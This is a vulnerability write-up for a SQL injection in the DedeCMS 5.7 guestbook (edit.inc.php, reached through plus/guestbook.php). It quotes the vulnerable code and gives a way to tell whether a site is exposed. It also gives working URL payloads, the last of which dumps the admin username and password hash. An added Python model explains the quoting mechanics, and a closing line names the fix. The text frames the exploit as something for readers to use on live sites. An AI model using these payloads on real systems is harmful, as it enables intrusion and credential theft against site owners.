This article covers the latest SQL injection in the guestbook of DedeCMS 5.7 (plus/guestbook.php); it is shared here for anyone who needs it.
Affected version: 5.7
Vulnerable file: edit.inc.php, reached through plus/guestbook.php?action=admin. The relevant code is below ($job, $id, $msg and $remsg are request parameters, which DedeCMS registers as globals):
<?php
if(!defined('DEDEINC')) exit('Request Error!');

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";

$id = intval($id);
if(empty($job)) $job = 'view';

if($job == 'del' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery("DELETE FROM `#@__guestbook` WHERE id='$id'");
    ShowMsg("Successfully deleted a message!", $GUEST_BOOK_POS);
    exit();
}
else if($job == 'check' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id'");
    ShowMsg("Successfully reviewed a message!", $GUEST_BOOK_POS);
    exit();
}
else if($job == 'editok')
{
    $remsg = trim($remsg);
    if($remsg != '')
    {
        // admin replies are not HTML-filtered   By:errorera blog:errs.cc
        if($g_isadmin)
        {
            $msg = "<p class='rebox'>".$msg."</p>\n<br/><font color=red>Admin reply:</font>".$remsg;
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg FROM `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "<p class='rebox'>".addslashes($row['msg'])."</p>\n";
            $remsg = TrimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
    // $msg is never filtered, so it can be injected freely   By:errorera home:www.errs.cc
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("Successfully changed or replied to a message!", $GUEST_BOOK_POS);
    exit();
}

if($g_isadmin)
{
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
    $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}
Conditions for successful exploitation:
1. PHP magic_quotes_gpc = Off
2. plus/guestbook.php exists on the target (and with it, of course, the dede_guestbook table), and at least one message exists, since the UPDATE is keyed on an existing message ID.
How to tell whether a site is vulnerable:
First open www.xxx.com/plus/guestbook.php; you can see other people's messages.
Hover over [reply/edit] next to someone else's message to see its ID, and note that ID down.
Then visit:
www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=<existing message ID>
On DedeCMS 5.7 the response is "Successfully changed or replied to a message!" whether or not the UPDATE actually succeeded: ShowMsg() runs unconditionally after ExecuteNoneQuery(), so this message proves nothing by itself.
Go back to www.xxx.com/plus/guestbook.php and check whether the content of that message ID has become errs.cc'
If it has, the site has magic_quotes_gpc = On: the quote was escaped to \' before reaching the query and was stored as-is, so the injection will not work there.
If the message was not changed (it still shows the old content), the unescaped quote broke the statement's quoting and the UPDATE failed silently; the vulnerability is exploitable.
Then visit:
www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=<existing message ID>&msg=',msg=user(),email='
Return to the guestbook: the content of that message ID has been replaced by the MySQL user().
That is roughly how it is used; anyone interested can dig further.
Finally, some people will ask how to get the back-end admin account's password. Work it out yourselves; it can definitely be dumped (if it couldn't, I would not have posted this).
/plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(SelecT CONCAT(userid,0x7c,pwd) from `%23@__admin` LIMIT 0,1),email='
Here 146 is the message ID found earlier, %23 URL-decodes to #, so `#@__admin` is rewritten to the prefixed admin table exactly as `#@__guestbook` is in the code above, and 0x7c is the | separator placed between userid and pwd in the result.
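To make the mechanics above concrete, the following is an added example written for this article (not code from the article or from DedeCMS). It models in Python the string concatenation of the job=editok branch: it builds the UPDATE exactly as edit.inc.php does, with and without magic_quotes_gpc (emulated with PHP's addslashes rules), then runs a minimal MySQL-style lexer over the result to list which columns the statement really assigns. The table prefix dede_, the posttime value and the message id 146 are assumptions; the three payloads are the article's, with %23 decoded to #.

```python
"""Added example: model of the UPDATE built by the job=editok branch of
DedeCMS 5.7 edit.inc.php.  Not DedeCMS code; assumptions are marked."""
import re

TABLE_PREFIX = "dede_"   # assumed prefix that DedeCMS substitutes for "#@__"
POSTTIME = 1300000000    # assumed stand-in for PHP time()


def addslashes(s):
    """PHP addslashes(): what magic_quotes_gpc=On applies to every GPC value."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def build_update(msg, msg_id, magic_quotes_gpc=False):
    """The statement edit.inc.php sends when $remsg is empty: $msg is pasted
    into the SQL untouched, only $id goes through intval().  The prefix
    substitution runs over the whole string, injected table names included."""
    if magic_quotes_gpc:
        msg = addslashes(msg)
    sql = "UPDATE `#@__guestbook` SET `msg`='%s', `posttime`='%d' WHERE id='%d' " % (
        msg, POSTTIME, int(msg_id))
    return sql.replace("#@__", TABLE_PREFIX)


def tokenize(sql):
    """Minimal MySQL lexer (default sql_mode): '...' literals honour \\x and ''
    escapes, `...` identifiers honour ``.  Quoted spans come back as one token;
    an unterminated quote raises ValueError, where MySQL raises a syntax error."""
    tokens, i, n = [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c.isspace():
            i += 1
        elif c in "'`":
            j = i + 1
            while True:
                if j >= n:
                    raise ValueError("unterminated %s starting at offset %d" % (c, i))
                if c == "'" and sql[j] == "\\":
                    j += 2                      # backslash escape: skip next char
                elif sql[j] == c:
                    if j + 1 < n and sql[j + 1] == c:
                        j += 2                  # doubled quote stays inside the literal
                    else:
                        break
                else:
                    j += 1
            tokens.append(sql[i:j + 1])
            i = j + 1
        elif c in "(),=":
            tokens.append(c)
            i += 1
        else:
            j = i
            while j < n and (sql[j].isalnum() or sql[j] in "_@$"):
                j += 1
            if j == i:
                j = i + 1                       # any other single character
            tokens.append(sql[i:j])
            i = j
    return tokens


def assigned_columns(sql):
    """Columns assigned in the top-level SET list, in order; injected
    assignments show up as extra entries."""
    cols, depth, in_set = [], 0, False
    toks = tokenize(sql)
    for k, tok in enumerate(toks):
        if depth == 0 and tok.upper() == "SET":
            in_set = True
        elif depth == 0 and tok.upper() == "WHERE":
            break
        elif tok == "(":
            depth += 1
        elif tok == ")":
            depth -= 1
        elif in_set and depth == 0 and tok == "=":
            cols.append(toks[k - 1].strip("`"))
    return cols


def message_literal(sql):
    """Decode the first SET value the way MySQL stores it (the errs.cc' probe)."""
    toks = tokenize(sql)
    body = toks[toks.index("=") + 1][1:-1]
    return re.sub(r"\\(.)", r"\1", body.replace("''", "'"))


# The article's payloads, URL-decoded (constructed input for this example)
PROBE = "errs.cc'"
USER_PAYLOAD = "',msg=user(),email='"
ADMIN_PAYLOAD = ("',msg=@`'`,msg=(SelecT CONCAT(userid,0x7c,pwd) "
                 "from `#@__admin` LIMIT 0,1),email='")


def outcome(payload, magic_quotes_gpc):
    """Columns the resulting UPDATE assigns, or 'syntax error' if it cannot parse."""
    try:
        return assigned_columns(build_update(payload, 146, magic_quotes_gpc))
    except ValueError:
        return "syntax error"


if __name__ == "__main__":
    for name, p in [("probe", PROBE), ("user()", USER_PAYLOAD), ("admin", ADMIN_PAYLOAD)]:
        for mq in (False, True):
            print("%-7s magic_quotes_gpc=%-5s -> %s" % (name, mq, outcome(p, mq)))
```

Running it shows why the probe works as a detector: with magic_quotes_gpc off the errs.cc' statement has an unterminated quote and fails (so the stored message does not change), while with it on the value is stored as errs.cc' and every later payload collapses into a single harmless string literal. With quoting off, the user() and admin payloads each add their own msg= and email= assignments to the SET list, and the prefix substitution obligingly turns `#@__admin` into the real admin table. The fix on the DedeCMS side is to escape $msg with the connection's escaping function, or better, to bind it as a query parameter, rather than relying on magic_quotes_gpc.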